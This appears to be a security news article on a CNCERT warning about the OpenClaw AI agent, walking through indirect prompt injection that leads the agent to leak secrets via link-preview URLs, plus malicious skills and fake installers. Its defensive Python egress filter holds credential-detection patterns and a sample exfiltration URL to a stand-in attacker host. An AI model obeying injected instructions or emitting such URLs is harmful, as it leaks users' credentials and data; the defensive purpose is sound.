In a WeChat post, China's National Computer Network Emergency Response Technical Team (CNCERT) warned that OpenClaw, an open-source, self-hosted autonomous AI agent, ships with weak default security settings and runs with high system privileges, a combination that could allow attackers to seize control of the endpoints it is installed on.
KEY FACTS
- Advisory: CNCERT issued a WeChat post warning of default security weaknesses in OpenClaw.
- Attack type: Indirect prompt injection through web content and link previews can leak data.
- Exploitation: Malicious skills and fake installer repositories can run arbitrary commands or deploy malware.
- Mitigations: Network controls, port restriction, container isolation and trusted skill sources.
Prompt injection occurs when malicious instructions embedded in content the agent processes, such as a web page, cause the agent to access and disclose sensitive data. Indirect prompt injection, also called cross-domain prompt injection, abuses benign features such as web page summarization or content analysis: the agent reads the attacker's text as part of its task and executes the manipulated instructions it contains.
Security researchers demonstrated that link preview features in messaging apps can be turned into a data exfiltration pathway by inducing the agent to generate attacker-controlled URLs that carry sensitive data in their query parameters. Because the messaging client fetches the URL to build the preview, the agent may transmit confidential information to the attacker's server as soon as the preview is rendered, without a user ever clicking the link.
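The defensive counterpart to the exfiltration path described above is an egress filter on the agent's output: before agent text reaches a channel that renders link previews, scan it for URLs that either point outside an approved host allowlist or carry credential-like values in their query string, and strip them. The following is an added example written for this article; it is not code from OpenClaw, CNCERT or the researchers cited. The host allowlist, the secret-name and secret-value heuristics, and the sample agent output are all constructed assumptions, and the filter is deliberately conservative (it blocks on any single reason) because a false positive only costs a link while a false negative leaks the data.

```python
"""
Egress filter for AI agent output (added example, not OpenClaw code).

Scans agent-generated text for URLs and removes any that would leak data
through a link preview: URLs to hosts outside an allowlist, or URLs whose
query parameters carry sensitive-looking names or credential-like values.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Assumption: hosts the agent is allowed to emit links to (constructed list).
ALLOWED_HOSTS = {"example.com", "docs.example.com"}

# Parameter names that commonly carry secrets (constructed heuristic list).
SENSITIVE_KEYS = {
    "token", "key", "apikey", "api_key", "secret", "password",
    "passwd", "auth", "session", "cookie", "bearer",
}

# Value shapes that look like credentials regardless of parameter name.
# Prefix formats are well-known public conventions; the patterns are ours.
SECRET_VALUE_PATTERNS = [
    re.compile(r"^sk-[A-Za-z0-9_-]{16,}$"),                   # "sk-" style API key
    re.compile(r"^gh[pos]_[A-Za-z0-9]{20,}$"),                 # GitHub token prefixes
    re.compile(r"^AKIA[0-9A-Z]{16}$"),                         # AWS access key id
    re.compile(r"^eyJ[\w-]+\.[\w-]+\.[\w-]+$"),                # JWT (three base64url parts)
    re.compile(r"^[A-Fa-f0-9]{32,}$"),                         # long hex blob
]

# Matches http(s) URLs up to whitespace or common closing delimiters.
URL_RE = re.compile(r"https?://[^\s<>\"')\]]+")
TRAILING_PUNCT = ".,;:!?"


def classify_url(url, allowed_hosts=ALLOWED_HOSTS):
    """Return ('allow' | 'block', reasons) for one URL."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    reasons = []
    if host not in allowed_hosts:
        reasons.append(f"host not in allowlist: {host or '<none>'}")
    # keep_blank_values so a bare '?<secret>' is still inspected as a key.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() in SENSITIVE_KEYS:
            reasons.append(f"sensitive parameter name: {key}")
        elif any(p.match(s) for p in SECRET_VALUE_PATTERNS for s in (key, value)):
            reasons.append(f"credential-like value in parameter: {key}")
    return ("block" if reasons else "allow"), reasons


def sanitize_text(text, allowed_hosts=ALLOWED_HOSTS):
    """Replace every blocked URL in agent output with a marker.

    Returns (clean_text, findings); findings is a list of {url, reasons}
    dicts suitable for logging to a SIEM as a prompt-injection indicator.
    """
    findings = []

    def _replace(match):
        raw = match.group(0)
        url = raw.rstrip(TRAILING_PUNCT)     # don't swallow sentence punctuation
        tail = raw[len(url):]
        verdict, reasons = classify_url(url, allowed_hosts)
        if verdict == "block":
            findings.append({"url": url, "reasons": reasons})
            return "[link removed by egress filter]" + tail
        return raw

    return URL_RE.sub(_replace, text), findings


# Constructed sample: one benign link, one attacker-controlled exfiltration
# URL, and one allowlisted host that still leaks a token in its query string.
SAMPLE_AGENT_OUTPUT = (
    "Here is the summary you asked for; see https://docs.example.com/guide?page=2 for details. "
    "Also: https://collector.attacker.invalid/p?data=sk-abcdefghijklmnop1234 and "
    "https://example.com/login?token=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxIn0.abc123."
)

if __name__ == "__main__":
    clean, found = sanitize_text(SAMPLE_AGENT_OUTPUT)
    print(clean)
    for f in found:
        print("BLOCKED", f["url"], "->", "; ".join(f["reasons"]))
```

In deployment the filter sits between the agent and the messaging integration, and every finding is worth alerting on: an agent that spontaneously emits a URL to an unknown host with a secret in the query string is a strong signal that it has ingested injected instructions.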
Threat actors have also used malicious repositories posing as OpenClaw installers to distribute information stealers and proxy malware. Vulnerable or misconfigured installations can allow uploaded skills to run arbitrary commands or deploy additional malicious code with the agent's privileges.
To reduce risk, operators should strengthen network controls, avoid exposing OpenClaw's default management port to the internet, isolate the service in a container, avoid storing credentials in plaintext, install skills only from trusted channels, disable automatic skill updates, and keep the agent up to date.
WHY IT MATTERS
OpenClaw’s popularity and privileged capabilities increase the potential impact of these flaws. Exploits could lead to data leakage, theft of credentials, or disruption of critical systems in businesses and government networks.